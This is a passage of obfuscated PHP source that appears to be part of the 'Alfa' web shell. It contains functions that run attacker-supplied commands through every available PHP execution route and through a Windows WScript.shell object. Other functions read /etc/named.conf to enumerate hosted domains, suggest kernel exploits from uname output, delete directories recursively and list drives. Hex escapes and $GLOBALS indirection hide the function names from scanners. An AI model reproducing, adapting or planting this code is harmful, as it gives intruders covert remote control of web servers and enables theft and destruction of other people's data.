hx($n){${"\x47L\x4fB\x41\x4c\x53"}["\x79x\x64\x69\x63\x66\x6d"]="\x69";$qbjeckkakcqt="\x69";${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x78t\x71\x79\x6a\x6d\x6dz\x78\x6em\x63"]}="";for(${${"\x47LO\x42\x41L\x53"}["\x79\x78\x64\x69\x63\x66\x6d"]}=0;${$qbjeckkakcqt}&lt;strlen(${${"GLO\x42\x41L\x53"}["\x78\x7a\x74o\x66\x78\x6cc"]});${${"\x47\x4c\x4f\x42\x41LS"}["\x65q\x6b\x76\x67\x6f\x70\x74\x66\x76\x6b\x6c"]}++){$wxsqnslbsvuf="\x79";${"\x47\x4c\x4f\x42\x41LS"}["ss\x71x\x77\x76\x65\x6fnu\x63"]="\x69";${"GLO\x42A\x4c\x53"}["\x62\x62\x7ad\x75\x74c\x77"]="\x6e";${$wxsqnslbsvuf}.=dechex(ord(${${"\x47\x4c\x4f\x42AL\x53"}["\x62\x62\x7ad\x75t\x63\x77"]}[${${"\x47LO\x42\x41L\x53"}["\x73\x73q\x78\x77\x76\x65o\x6e\x75\x63"]}]));}return${${"G\x4cO\x42\x41LS"}["\x78\x74\x71\x79j\x6dm\x7a\x78\x6e\x6dc"]};}function unx($y){${"\x47L\x4fB\x41L\x53"}["\x73\x67\x6d\x71tk\x6e\x6a\x74"]="\x6e";${"\x47\x4c\x4fB\x41L\x53"}["\x66f\x71\x6e\x67\x65\x61"]="\x6e";${${"G\x4c\x4f\x42AL\x53"}["f\x66\x71\x6e\x67\x65\x61"]}="";$hxlugqt="\x79";for(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["eq\x6bv\x67\x6fp\x74f\x76\x6b\x6c"]}=0;${${"GLO\x42A\x4c\x53"}["\x65qk\x76\x67\x6fp\x74\x66\x76kl"]}&lt;strlen(${$hxlugqt})-1;${${"\x47\x4cOB\x41L\x53"}["\x65q\x6b\x76g\x6f\x70\x74\x66\x76k\x6c"]}+=2){${${"\x47LOBA\x4cS"}["\x78\x7a\x74\x6f\x66\x78\x6cc"]}.=chr(hexdec(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x74\x71y\x6a\x6dm\x7axn\x6dc"]}[${${"\x47\x4cOB\x41\x4c\x53"}["\x65\x71\x6b\x76\x67\x6f\x70\x74fv\x6b\x6c"]}].${${"G\x4cO\x42\x41LS"}["x\x74\x71\x79\x6a\x6dm\x7a\x78\x6e\x6dc"]}[${${"GL\x4fBA\x4c\x53"}["\x65q\x6bv\x67\x6f\x70t\x66\x76\x6b\x6c"]}+1]));}return${${"G\x4c\x4fB\x41\x4cS"}["\x73g\x6dqt\x6bn\x6a\x74"]};}function suggest_exploit(){$diuzpf="\x70\x6c";$hhdwilggrn="\x75n\x61m\x65";$kbexlbup="x\x70\x6c\x6f\x64";${$hhdwilggrn}=$GLOBALS["\x66\x75ng\x73\x69"][8]();$nrcbdhhv="u\x6e\x61\x6d\x65";$xtebapw="\x78\x70\x6c\x64";$xbwthodoi="\x70\x6c";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x76yf\x7ah\x74\x64\x63\x78\x73"]}=explode("\x20",${$nrcbdhhv});${${"\x47L\x4f\x42\x41L\x53"}["\x6etoy\x72\x79\x64\x66"]}=explode("-",${$kbexlbup}[2]);${${"\x47\x4c\x4f\x42\x41LS"}["k\x6c\x6d\x75\x75\x6fx"]}=explode("\x2e",${$xtebapw}[0]);return${${"\x47LO\x42A\x4cS"}["klm\x75\x75o\x78"]}[0]."\x2e".${$xbwthodoi}[1]."\x2e".${$diuzpf}[2];}function s(){$wjvgukuf="d\x30\x6d\x61\x69n\x73";${$wjvgukuf}=@$GLOBALS["\x66\x75\x6eg\x73\x69"][7]("/et\x63/n\x61\x6d\x65\x64\x2e\x63\x6f\x6e\x66",false);$ikaoszvvt="\x64\x6fm";if(!${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x74\x78\x6d\x66\x77\x75\x6db\x71\x73"]}){${${"G\x4cO\x42\x41L\x53"}["mmpn\x72b\x62\x69v\x74\x6b"]}="&lt;fo\x6et \x63ol\x6fr=r\x65\x64\x20si\x7a\x65=\x32\x70x\x3eC\x61\x6et\x20R\x65ad\x20[\x20/\x65tc/\x6e\x61\x6ded.c\x6f\x6ef\x20]\x3c/f\x6f\x6et\x3e";$GLOBALS["\x6e\x65\x65\x64\x5ft\x6f\x5f\x75pda\x74\x65_he\x61d\x65\x72"]="\x74r\x75e";}else{${${"\x47\x4c\x4f\x42\x41L\x53"}["gd\x62\x64\x6e\x67\x75\x69\x6boq"]}=0;${"GL\x4fB\x41\x4c\x53"}["\x6cle\x72\x68\x6cnh"]="\x640\x6d\x61ins";$kvkbtwyfxkr="d\x6fm";foreach(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6c\x6c\x65\x72\x68lnh"]} as${${"\x47\x4cO\x42AL\x53"}["\x67\x6a\x6bj\x66lfy\x6e\x67"]}){if(@strstr(${${"G\x4cO\x42A\x4c\x53"}["\x67j\x6bjf\x6c\x66\x79\x6e\x67"]},"\x7ao\x6e\x65")){$evpjhuatstbd="d\x30\x6d\x61\x69n";preg_match_all("\x23\x7a\x6fn\x65 \"(.*)\x22#",${$evpjhuatstbd},${${"GL\x4fB\x41L\x53"}["\x79\x6elq\x79\x6c\x6f"]});flush();if(strlen(trim(${${"GL\x4f\x42AL\x53"}["\x79\x6e\x6cq\x79l\x6f"]}[1][0]))&gt;2){flush();${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x67d\x62\x64\x6egu\x69k\x6fq"]}++;}}}${$kvkbtwyfxkr}="$count Dom\x61\x69n";}return${$ikaoszvvt};}function cmd($in,$re=false){${"\x47L\x4fB\x41\x4cS"}["\x62\x74ab\x67\x6c\x6c\x71\x69hd"]="ou\x74";${${"\x47\x4cO\x42\x41\x4c\x53"}["b\x74\x61\x62\x67ll\x71\x69\x68\x64"]}="";try{${"GL\x4fBA\x4c\x53"}["l\x66\x6foq\x74zm\x6b"]="\x69\x6e";if(${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6c\x79\x72oh\x6dvl\x65"]})${${"\x47L\x4fB\x41\x4c\x53"}["\x77\x73\x70\x6f\x78a"]}=${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6c\x66o\x6f\x71\x74\x7a\x6d\x6b"]}." \x32\x3e\x26\x31";if(function_exists("\x65\x78\x65\x63")){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x74\x73lf\x6d\x65\x76\x66\x6f"]="\x6fu\x74";@$GLOBALS["fu\x6egs\x69"][16](${${"\x47\x4c\x4fB\x41\x4cS"}["w\x73\x70\x6f\x78a"]},${${"GL\x4f\x42A\x4c\x53"}["\x77y\x66a\x68b\x75\x76s\x71"]});${${"\x47\x4cO\x42\x41\x4c\x53"}["\x74\x73\x6cf\x6d\x65\x76f\x6f"]}=@join("\n",${${"\x47\x4cOB\x41L\x53"}["\x77\x79\x66ah\x62\x75vs\x71"]});}elseif(function_exists("\x70\x61\x73\x73\x74\x68\x72\x75")){${"\x47\x4c\x4f\x42AL\x53"}["ih\x61\x72\x69\x79\x6c"]="i\x6e";ob_start();@$GLOBALS["\x66u\x6egsi"][17](${${"G\x4c\x4f\x42ALS"}["\x69\x68\x61r\x69\x79l"]});${${"G\x4cO\x42AL\x53"}["\x77y\x66a\x68\x62u\x76\x73\x71"]}=ob_get_clean();}elseif(function_exists("\x73\x79\x73\x74\x65\x6d")){$coxolylp="i\x6e";ob_start();@$GLOBALS["\x66un\x67\x73i"][18](${$coxolylp});${${"\x47\x4cO\x42\x41\x4c\x53"}["\x77y\x66a\x68\x62\x75\x76\x73\x71"]}=ob_get_clean();}elseif(function_exists("\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65\x63")){$pkktvknbjm="o\x75t";${$pkktvknbjm}=$GLOBALS["\x66ung\x73\x69"][19](${${"\x47\x4cO\x42\x41LS"}["w\x73\x70o\x78\x61"]});}elseif(function_exists("\x70\x6f\x70\x65\x6e")&amp;&amp;function_exists("\x70\x63\x6c\x6f\x73\x65")){${"\x47L\x4f\x42A\x4cS"}["t\x74\x68\x72\x71\x63\x74"]="\x69n";if(is_resource(${${"\x47LO\x42\x41\x4c\x53"}["v\x62\x78ow\x70\x68v\x6br"]}=@$GLOBALS["\x66\x75n\x67\x73\x69"][20](${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x74\x74\x68rq\x63\x74"]},"r"))){${${"\x47\x4c\x4fB\x41\x4cS"}["\x77y\x66\x61h\x62\x75\x76\x73\x71"]}="";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6ed\x66c\x6b\x6d\x6d\x69v\x67"]="\x66";${"G\x4c\x4fBA\x4c\x53"}["y\x65\x69h\x72\x68\x72e\x68\x76\x63"]="\x66";while(!@feof(${${"GL\x4f\x42\x41L\x53"}["\x6e\x64\x66\x63k\x6dmi\x76g"]}))${${"\x47LO\x42\x41\x4c\x53"}["w\x79fa\x68b\x75\x76\x73q"]}.=fread(${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x76b\x78\x6f\x77ph\x76k\x72"]},1024);$GLOBALS["f\x75\x6eg\x73\x69"][21](${${"\x47L\x4fB\x41\x4cS"}["\x79\x65\x69\x68\x72\x68\x72\x65\x68v\x63"]});}}elseif(function_exists("\x70\x72\x6f\x63\x5f\x6f\x70\x65\x6e")){$asutxouiqkrp="\x70\x69\x70\x65\x73";${"\x47\x4cO\x42\x41\x4c\x53"}["\x6e\x78x\x67kq\x63\x6d\x6e\x63\x77"]="\x70\x69\x70\x65\x73";$djiuyq="in";${$asutxouiqkrp}=array();${"\x47\x4c\x4f\x42\x41\x4cS"}["r\x72\x6ag\x69f\x67xk\x72\x62"]="\x70\x69p\x65\x73";${${"\x47\x4cOB\x41\x4c\x53"}["\x74o\x6f\x6e\x61\x6fm\x78\x75\x74"]}=@$GLOBALS["fu\x6eg\x73i"][23](${$djiuyq}."\x20\x32&gt;\x26\x31",array(array("\x70ipe","\x77"),array("p\x69pe","w"),array("\x70\x69\x70e","\x77")),${${"\x47\x4cOB\x41\x4cS"}["r\x72jg\x69fgx\x6b\x72b"]},null);${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x77\x79\x66\x61\x68\x62\x75v\x73\x71"]}=@$GLOBALS["f\x75n\x67\x73\x69"][22](${${"G\x4c\x4f\x42\x41\x4cS"}["\x6e\x78\x78g\x6b\x71\x63m\x6e\x63\x77"]}[1]);}elseif(class_exists("\x43\x4f\x4d")){$nugdwekf="\x6f\x75\x74";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x66d\x6c\x6dmhy\x62"]="alf\x61\x57\x73";${"\x47LO\x42A\x4cS"}["\x69\x72q\x64s\x6d\x6a\x63"]="\x73\x74\x64\x6f\x75t";$clpsqw="\x65x\x65\x63";${${"GL\x4fB\x41LS"}["f\x64\x6c\x6d\x6dhyb"]}=new COM("\x57Sc\x72\x69\x70\x74.\x73\x68\x65\x6c\x6c");${$clpsqw}=$alfaWs-&gt;$GLOBALS["f\x75\x6e\x67s\x69"][16]("\x63\x6d\x64\x2eexe\x20/c\x20".$_POST["\x61\x6c\x66\x611"]);${${"\x47L\x4f\x42\x41\x4c\x53"}["\x69\x72\x71\x64s\x6d\x6ac"]}=$exec-&gt;StdOut();${$nugdwekf}=$stdout-&gt;ReadAll();}}catch(Exception$e){}return$out;}function winpwd(){return str_replace("\\","/",$GLOBALS["f\x75n\x67\x73i"][0]());}function remove_slash($val){${"\x47L\x4f\x42\x41LS"}["\x71f\x68\x66\x64\x6f\x75\x74nu\x6f\x79"]="t\x65x";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x66x\x63\x6b\x6bc\x6b\x64"]="\x74e\x78";$uavomuoiz="t\x65\x781";${"\x47\x4c\x4f\x42AL\x53"}["u\x61fp\x6e\x6au"]="\x74\x65x\x34";${${"\x47\x4cO\x42ALS"}["fx\x63\x6b\x6b\x63\x6bd"]}=str_replace("/","",${${"\x47L\x4fB\x41\x4c\x53"}["\x71\x64\x6dj\x78\x6f\x6di\x6fz\x66\x62"]});$dlpjqn="t\x65\x78\x32";${"\x47L\x4fB\x41\x4c\x53"}["\x78\x66t\x61\x68sh\x6f\x66\x6e"]="\x74\x65x2";${$uavomuoiz}=str_replace(":","",${${"\x47LO\x42A\x4c\x53"}["\x71\x66\x68\x66d\x6f\x75\x74\x6e\x75\x6fy"]});${$dlpjqn}=str_replace("_","",${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x68\x78\x6f\x70\x71\x64\x6a\x70\x76"]});${${"\x47L\x4f\x42\x41\x4c\x53"}["\x74\x74\x6d\x78y\x78q\x66\x63\x72i"]}=str_replace(" ","",${${"GL\x4f\x42AL\x53"}["\x78ft\x61h\x73ho\x66n"]});${${"\x47LO\x42A\x4c\x53"}["\x75\x61\x66p\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\x75"]}=str_replace("\x2e","",${${"\x47\x4cOBAL\x53"}["t\x74m\x78\x79\x78\x71f\x63\x72\x69"]});return${${"\x47\x4c\x4f\x42\x41LS"}["\x66\x66g\x63g\x6a\x73\x6c\x70h\x6b\x72"]};}function unlinkDir($dir){$bysucqcvmf="\x64\x69\x72";$vououjhxsus="\x66\x69\x6c\x65\x73";$fopmipjksk="\x64i\x72\x73";${"\x47\x4cO\x42\x41\x4cS"}["aira\x72d\x67\x65hl"]="\x69";${${"\x47L\x4f\x42\x41L\x53"}["\x6e\x6eg\x65\x72\x78\x6bdl\x6e"]}=array(${$bysucqcvmf});${${"\x47L\x4f\x42\x41L\x53"}["\x79c\x78\x73\x70p\x77\x75"]}=array();for(${${"GL\x4f\x42\x41\x4c\x53"}["\x65qk\x76\x67\x6f\x70\x74\x66\x76\x6b\x6c"]}=0;;${${"\x47\x4c\x4fBA\x4c\x53"}["\x61i\x72a\x72\x64ge\x68\x6c"]}++){$dpqcytqjp="\x64\x69\x72";$ybwyppixe="\x64i\x72s";${"\x47\x4cO\x42A\x4c\x53"}["\x75gdt\x70\x79\x69p\x6a"]="\x6fp\x65\x6e\x44\x69\x72";if(isset(${${"G\x4cO\x42\x41L\x53"}["\x6e\x6ege\x72\x78\x6b\x64\x6c\x6e"]}[${${"\x47\x4c\x4fBA\x4cS"}["\x65q\x6b\x76\x67o\x70\x74\x66\x76k\x6c"]}]))${${"\x47\x4c\x4f\x42AL\x53"}["\x62\x6f\x6a\x76m\x6d\x6c\x7a\x62\x6b\x73"]}=${$ybwyppixe}[${${"\x47L\x4f\x42\x41\x4cS"}["\x65q\x6b\x76\x67\x6f\x70t\x66\x76\x6b\x6c"]}];else break;if(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x75\x67\x64t\x70y\x69\x70\x6a"]}=opendir(${$dpqcytqjp})){${"\x47\x4cO\x42\x41LS"}["\x76v\x78\x75\x6c\x75"]="r\x65\x61d\x44\x69\x72";while(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["v\x76\x78\x75\x6c\x75"]}=@readdir(${${"\x47L\x4f\x42\x41\x4c\x53"}["\x79m\x73\x79\x77\x78pb"]})){$hpchbogovwb="\x72\x65a\x64Di\x72";if(${$hpchbogovwb}!="\x2e"&amp;&amp;${${"\x47\x4cO\x42\x41L\x53"}["\x70\x76\x72\x68\x75\x71\x64\x6ee\x78i"]}!="\x2e."){$dkngjuomj="\x72e\x61\x64D\x69r";if($GLOBALS["\x66\x75\x6eg\x73\x69"][2](${${"\x47L\x4f\x42\x41L\x53"}["b\x6f\x6a\x76\x6d\x6dl\x7a\x62\x6b\x73"]}."/".${$dkngjuomj})){$cdpeofetkb="\x64\x69\x72s";${$cdpeofetkb}[]=${${"GL\x4f\x42\x41\x4cS"}["b\x6f\x6av\x6d\x6d\x6c\x7ab\x6b\x73"]}."/".${${"G\x4cO\x42A\x4c\x53"}["\x70\x76\x72h\x75\x71\x64\x6eex\x69"]};}else{${${"\x47\x4cO\x42A\x4c\x53"}["y\x63\x78s\x70\x70\x77u"]}[]=${${"\x47L\x4f\x42A\x4c\x53"}["b\x6f\x6a\x76m\x6dl\x7abk\x73"]}."/".${${"G\x4c\x4fBA\x4c\x53"}["\x70v\x72h\x75\x71d\x6ee\x78\x69"]};}}}}}foreach(${$vououjhxsus} as${${"\x47\x4cO\x42A\x4c\x53"}["\x70s\x70\x69\x6b\x6am\x73\x6f\x76"]}){$GLOBALS["f\x75\x6eg\x73i"][24](${${"GLO\x42\x41\x4c\x53"}["\x70\x73\x70\x69\x6b\x6a\x6dso\x76"]});}${$fopmipjksk}=array_reverse(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6e\x6e\x67\x65r\x78\x6bd\x6c\x6e"]});foreach(${${"\x47\x4c\x4fB\x41L\x53"}["n\x6e\x67e\x72xkdl\x6e"]} as${${"\x47\x4c\x4f\x42\x41L\x53"}["\x62o\x6a\x76\x6dmlz\x62k\x73"]}){$GLOBALS["f\x75ng\x73i"][25](${${"\x47LO\x42A\x4c\x53"}["\x62\x6f\x6a\x76m\x6dl\x7a\x62\x6b\x73"]});}}function remove_dot($file){$ggeqih="\x46I\x4cE\x53";$uzexlardpv="\x46I\x4c\x45S";$eefnrus="f\x69l\x65";${$ggeqih}=${$eefnrus};${${"\x47\x4c\x4fBAL\x53"}["\x62\x71\x65\x66\x62lg\x6c\x6be"]}=explode("\x2e",${$uzexlardpv});return${${"\x47LO\x42A\x4c\x53"}["\x62q\x65\x66blgl\x6be"]}[0];}function windowsDriver(){$evqwrghrvh="\x77i\x6eA\x72\x72";${$evqwrghrvh}=["\x41","B","\x43","\x44","E","F","\x47","H","I","\x4a","K","L","M","\x4e","\x4f","\x50","Q","\x52","S","\x54","V","\x57","\x58","Y","Z"];foreach(${${"GL\x4fBAL\x53"}["\x6e\x79\x77\x79\x64\x64\x6c\x67z"]} as${${"\x47\x4c\x4f\x42\x41L\x53"}["d\x73\x78okk\x76"]}=&gt;${${"GL\x4f\x42\x41\x4c\x53"}["g\x73\x64\x72\x65p\x6ffs\x70"]}){if(is_dir(${${"\x47L\x4f\x42\x41LS"}["gs\x64\x72\x65\x70of\x73\x70"]}.":/")){${"G\x4c\x4f\x42A\x4cS"}["\x79xk\x6byh\x70qn\x61\x73"]="\x77\x69n\x56\x61\x6c";echo"\x3ca s\x74\x79le\x3d'c\x6f\x6co\x72:or\x61nge\x3b\x20font-w\x65\x69\x67\x68t:b\x6fld\x3b\x27 \x68r\x65\x66=\x27?d=".hx(${${"G\x4c\x4fB\x41L\x53"}["g\x73d\x72e\x70\x6f\x66\x73p"]}.":/")."\x27&gt;[ ".${${"G\x4c\x4fBAL\x53"}["y\x78k\x6b\x79\x68\x70\x71n\x61\x73"]}." ]\x3c/\x61&gt;\x26\x6eb\x73\x70\x3b";}}}function namaPanjang($value){$gyhwjphlsg="val\x75\x65";$jfkqommi="\x6e\x61\x6d\x61Ny\x61";${"\x47\x4c\x4fB\x41\x4c\x53"}["n\x70\x74p\x69\x6f\x68i"]="\x76\x61\x6c\x75\x65";${$jfkqommi}=${$gyhwjphlsg};${${"G\x4c\x4fB\x41\x4cS"}["\x6c\x78\x62\x6d\x76ktx\x68\x66"]}=pathinfo(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6e\x70\x74p\x69\x6f\x68\x69"]},PATHINFO_EXTENSION);if(strlen(${${"\x47\x4c\x4fBA\x4cS"}["\x61\x77\x71\x65\x7aw\x73\x6d\x72uq"]})&gt;30){$nuuxlqlrd="n\x61\x6d\x61\x4eya";return substr(${$nuuxlqlrd},0,30).".\x2e\x2e";}else{$kfdgfksn="v\x61\x6cue";return${$kfdgfksn};}}function perms($file){${"\x47\x4cO\x42A\x4c\x53"}["\x6a\x65\x65\x77\x62\x61\x76v"]="p\x65\x72m\x73";$hegyxcwvr="\x70e\x72\x6d\x73";$dkqdbi="\x70\x65r\x6d\x73";$vgetvrnkgbut="per\x6ds";$gfyfrcaij="p\x65r\x6d\x73";${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x75\x62\x68\x6b\x6f\x7a\x6f\x73ct"]}=$GLOBALS["\x66\x75n\x67\x73i"][6](${${"\x47\x4c\x4fBA\x4c\x53"}["\x70\x73\x70\x69\x6bjm\x73\x6f\x76"]});${"\x47\x4cO\x42\x41\x4cS"}["f\x72c\x6a\x62\x6f\x62\x73\x77"]="\x70erm\x73";${"GL\x4f\x42\x41\x4cS"}["\x6anlva\x75lu"]="p\x65rms";$vezscedu="i\x6e\x66\x6f";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6c\x76\x6b\x68\x65j\x6f\x6bs\x62t"]="\x70\x65r\x6d\x73";${"\x47L\x4f\x42AL\x53"}["\x62\x71\x70o\x73i\x6d"]="\x70e\x72\x6d\x73";${"\x47L\x4fBA\x4c\x53"}["g\x78l\x62\x72e\x61\x66\x61\x73\x78u"]="p\x65\x72\x6d\x73";${"G\x4c\x4fB\x41\x4c\x53"}["x\x67\x6aum\x6c\x67"]="\x69\x6ef\x6f";${"G\x4cO\x42A\x4c\x53"}["\x74\x6ai\x75m\x73\x66h\x64"]="\x69\x6ef\x6f";${"\x47L\x4f\x42AL\x53"}["\x74\x6dj\x6c\x64\x6b\x70"]="\x70\x65\x72m\x73";$fxpsyv="\x69\x6e\x66o";$dihuprw="\x69nf\x6f";$bgbjimms="per\x6d\x73";${"\x47\x4c\x4fBAL\x53"}["\x62\x73\x79\x75u\x71\x70t\x7as\x65"]="\x69n\x66\x6f";${"GL\x4f\x42\x41LS"}["\x7a\x71\x75\x76\x62\x6d\x65"]="p\x65\x72\x6d\x73";if((${${"\x47\x4c\x4f\x42\x41\x4cS"}["j\x65\x65\x77\x62\x61v\x76"]}&amp;0xC000)==0xC000){${${"GL\x4fBA\x4c\x53"}["\x70\x66\x78\x6fdv\x6d"]}="s";}elseif((${${"\x47\x4c\x4f\x42A\x4c\x53"}["ub\x68ko\x7a\x6f\x73\x63t"]}&amp;0xA000)==0xA000){${${"\x47L\x4fB\x41\x4c\x53"}["\x70\x66\x78\x6f\x64vm"]}="\x6c";}elseif((${$vgetvrnkgbut}&amp;0x8000)==0x8000){$gsbwiutx="\x69\x6ef\x6f";${$gsbwiutx}="-";}elseif((${${"G\x4c\x4f\x42A\x4cS"}["\x75\x62h\x6b\x6f\x7ao\x73c\x74"]}&amp;0x6000)==0x6000){$hrujmhbj="in\x66\x6f";${$hrujmhbj}="b";}elseif((${${"GLO\x42\x41\x4cS"}["\x66\x72\x63\x6abob\x73\x77"]}&amp;0x4000)==0x4000){$owhtylj="\x69\x6e\x66\x6f";${$owhtylj}="\x64";}elseif((${${"\x47L\x4f\x42\x41LS"}["\x6a\x6e\x6c\x76au\x6c\x75"]}&amp;0x2000)==0x2000){$vjwfmpidnsr="in\x66\x6f";${$vjwfmpidnsr}="c";}elseif((${$hegyxcwvr}&amp;0x1000)==0x1000){$rqbndwnomyrx="\x69\x6ef\x6f";${$rqbndwnomyrx}="\x70";}else{${${"GL\x4fBA\x4c\x53"}["\x70\x66\x78o\x64\x76\x6d"]}="\x75";}${${"GLO\x42\x41L\x53"}["\x78\x67ju\x6dl\x67"]}.=((${${"G\x4c\x4fB\x41\x4c\x53"}["\x75\x62\x68\x6b\x6fz\x6f\x73\x63\x74"]}&amp;0x0100)?"r":"-");${$dihuprw}.=((${${"\x47LO\x42\x41\x4c\x53"}["\x6c\x76\x6b\x68\x65\x6a\x6fk\x73b\x74"]}&amp;0x0080)?"w":"-");${${"G\x4cO\x42\x41L\x53"}["\x70\x66\x78o\x64v\x6d"]}.=((${${"G\x4cOB\x41\x4c\x53"}["\x74\x6d\x6a\x6c\x64kp"]}&amp;0x0040)?((${${"G\x4c\x4f\x42\x41LS"}["gxl\x62re\x61\x66\x61s\x78\x75"]}&amp;0x0800)?"s":"x"):((${${"G\x4c\x4f\x42\x41L\x53"}["\x75\x62hk\x6f\x7a\x6f\x73c\x74"]}&amp;0x0800)?"S":"-"));${${"GL\x4f\x42\x41L\x53"}["\x74\x6a\x69\x75\x6d\x73f\x68\x64"]}.=((${$bgbjimms}&amp;0x0020)?"r":"-");${$fxpsyv}.=((${${"\x47L\x4f\x42\x41\x4c\x53"}["u\x62\x68\x6b\x6f\x7aosc\x74"]}&amp;0x0010)?"\x77":"-");${${"\x47\x4cOBA\x4cS"}["\x70\x66x\x6fdvm"]}.=((${${"G\x4cO\x42A\x4c\x53"}["\x62qp\x6fs\x69\x6d"]}&amp;0x0008)?((${${"\x47L\x4fBA\x4c\x53"}["\x75\x62\x68\x6b\x6f\x7a\x6f\x73\x63t"]}&amp;0x0400)?"\x73":"\x78"):((${${"G\x4c\x4f\x42\x41\x4c\x53"}["ub\x68\x6bo\x7a\x6f\x73\x63\x74"]}&amp;0x0400)?"S":"-"));${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x62\x73\x79\x75\x75\x71\x70\x74\x7ase"]}.=((${${"GL\x4fB\x41\x4cS"}["\x7a\x71\x75\x76\x62me"]}&amp;0x0004)?"r":"-");${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x70\x66\x78o\x64\x76\x6d"]}.=((${${"G\x4c\x4fB\x41\x4cS"}["\x75bhk\x6f\x7a\x6fs\x63\x74"]}&amp;0x0002)?"\x77":"-");${$vezscedu}.=((${$dkqdbi}&amp;0x0001)?((${$gfyfrcaij}&amp;0x0200)?"\x74":"x"):((${${"\x47\x4c\x4f\x42A\x4cS"}["u\x62\x68\x6b\x6fz\x6f\x73\x63\x74"]}&amp;0x0200)?"\x54":"-"));return${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x70\x66x\x6f\x64\x76m"]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